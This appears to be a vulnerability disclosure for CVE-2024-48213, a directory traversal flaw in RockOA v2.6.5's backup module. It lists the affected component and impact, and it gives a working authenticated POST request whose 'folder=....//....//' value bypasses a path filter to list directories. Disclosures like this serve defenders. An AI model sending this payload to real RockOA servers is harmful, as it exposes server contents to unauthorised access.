CVE-2024-48213.md

[CVE-ID]

CVE-2024-48213

[DESCRIPTION]

RockOA v2.6.5 is vulnerable to Directory Traversal in webmain/system/beifen/beifenAction.php.

[Vulnerability Type]

Directory Traversal

[Vendor of Product]

http://www.rockoa.com/

[Affected Product Code Base]

rockoa v2.6.5 - rockoa v2.6.5

[Affected Component]

webmain/system/beifen/beifenAction.php # beifenClassAction # getdatssssAjax()

[Attack Type]

Remote

[Impact Information Disclosure]

True

[CVE Impact Other]

Listing directory

[Attack Vectors]

Login first, then:

POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true folder=....//....//

[Discoverer]

https://github.com/N0zoM1z0/

[Reference]

http://rockoa.com

http://www.rockoa.com/